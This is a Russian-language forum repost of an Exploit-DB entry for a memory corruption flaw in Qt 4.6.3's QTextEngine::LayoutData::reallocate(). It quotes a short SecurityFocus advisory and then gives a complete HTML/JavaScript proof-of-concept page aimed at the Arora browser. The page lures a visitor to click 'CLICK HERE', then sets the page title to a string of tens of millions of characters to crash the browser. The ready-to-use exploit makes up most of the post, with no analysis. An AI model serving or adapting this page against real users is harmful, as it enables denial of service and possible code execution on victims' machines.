Exploit Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34364
Проверка EDB
  1. Пройдено
Автор
D4RK357
Тип уязвимости
DOS
Платформа
LINUX
CVE
N/A
Дата публикации
2010-07-13
Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption
HTML:
source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. 

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>
 
Источник
www.exploit-db.com